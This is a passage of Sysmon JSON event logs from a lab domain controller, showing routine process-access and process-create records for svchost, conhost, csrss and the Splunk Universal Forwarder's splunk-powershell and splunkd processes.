05:59:53.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7750,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.059\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-04D9-5F25-0000-0010097F1100}\r\nTargetProcessId: 2932\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.059","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-04D9-5F25-0000-0010097F1100}","TargetProcessId":"2932","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7751,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.200\r\nSourceProcessGUID: {A837DB8D-04D9-5F25-0000-0010097F1100}\r\nSourceProcessId: 2932\r\nSourceThreadId: 672\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.200","SourceProcessGUID":"{A837DB8D-04D9-5F25-0000-0010097F1100}","SourceProcessId":"2932","SourceThreadId":"672","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7752,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.701\r\nProcessGuid: {A837DB8D-04D9-5F25-0000-0010C5801100}\r\nProcessId: 4996\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.701","ProcessGuid":"{A837DB8D-04D9-5F25-0000-0010C5801100}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7753,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.700\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-04CC-5F25-0000-0010CAAD1000}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.700","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-04CC-5F25-0000-0010CAAD1000}","TargetProcessId":"4996","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7754,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.700\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CC-5F25-0000-0010CAAD1000}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.700","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CC-5F25-0000-0010CAAD1000}","TargetProcessId":"4996","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7755,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7756,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7757,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7758,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 